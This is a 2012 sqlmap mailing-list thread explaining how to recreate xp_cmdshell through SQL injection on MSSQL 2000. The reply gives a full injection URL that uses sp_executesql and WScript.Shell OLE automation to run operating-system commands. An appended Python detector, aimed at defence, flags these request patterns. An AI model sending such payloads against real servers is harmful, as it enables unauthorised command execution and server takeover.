Re: [sqlmap-users] re-create xp_cmdshell
From: Miroslav S. <mir...@gm...> - 2012-06-18 10:38:26
My bad. I've thought that the problem is trivial :)

This is the right way how to do it:

http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;--

(https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py)

That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you.

Kind regards,
Miroslav Stampar

On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Adi.
>
> This means that CREATE PROCEDURE has to be used right after the semi-colon
> (;) sign.
>
> So, if you have a SELECT SQLi case like:
> SELECT * FROM users WHERE id=$_GET['id']
>
> you would need to inject into it something like:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE..
>
> As you are probably using "recreate steps" from
> https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean
> that you would need to inject:
> http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd
> varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int,
> @RunResult int%0a....
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote:
>
>> Hello,
>>
>> I have a mssql 2000 sql injection in a pentest, I try to recreate
>> xp_cmdshell and I get this:
>>
>> 'CREATE PROCEDURE' must be the first statement in a query batch.
>>
>> Anybody has any idea about this behaviour and if it can be done something
>> about this?
>>
>> Thanks
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
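A detection-side view of the two request shapes discussed in this thread, as an added example that is not part of the thread or of sqlmap: a rule that only looks for `;CREATE PROCEDURE` misses the `sp_executesql` form, so the string-wrapped statement and the OLE automation procedures need their own rules. The rule names and sample URLs are constructed for illustration, and the code assumes the web server logs the full query string.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators taken from the statements quoted in the thread (rule names are hypothetical).
RULES = {
    "stacked_create_procedure": re.compile(r";\s*create\s+proc(edure)?\b", re.I),
    "create_procedure_in_string": re.compile(r"'\s*create\s+proc(edure)?\b", re.I),
    "dynamic_sql_exec": re.compile(r"\bsp_executesql\b", re.I),
    "ole_automation": re.compile(r"\bsp_OA(Create|Method|Destroy)\b", re.I),
    "xp_cmdshell_reference": re.compile(r"\bxp_cmdshell\b", re.I),
}

def normalise(query: str) -> str:
    """URL-decode twice (to catch double encoding) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded)

def scan_request(url: str) -> list[str]:
    """Return the sorted names of all rules that match the request's query string."""
    query = normalise(urlsplit(url).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

# Constructed sample requests: benign, direct stacked form, sp_executesql-wrapped form.
SAMPLES = [
    "http://www.target.com/vuln.asp?id=1",
    "http://www.target.com/vuln.asp?id=1;CREATE%20PROCEDURE%20xp_cmdshell"
    "(@cmd%20varchar(255))%20AS",
    "http://www.target.com/vuln.asp?id=1%3BDECLARE%20@abc%20nvarchar(999)%3B%20"
    "SET%20@abc=%27CREATE%20PROCEDURE%20xp_cmdshell(@cmd%20varchar(255))%20AS%20"
    "DECLARE%20@ID%20int%20EXEC%20sp_OACreate%20%27%27WScript.Shell%27%27,"
    "%20@ID%20OUT%27%3B%20EXEC%20master..sp_executesql%20@abc%3B--",
]

if __name__ == "__main__":
    for url in SAMPLES:
        hits = scan_request(url)
        print("ALERT" if hits else "ok   ", hits, url[:60])
```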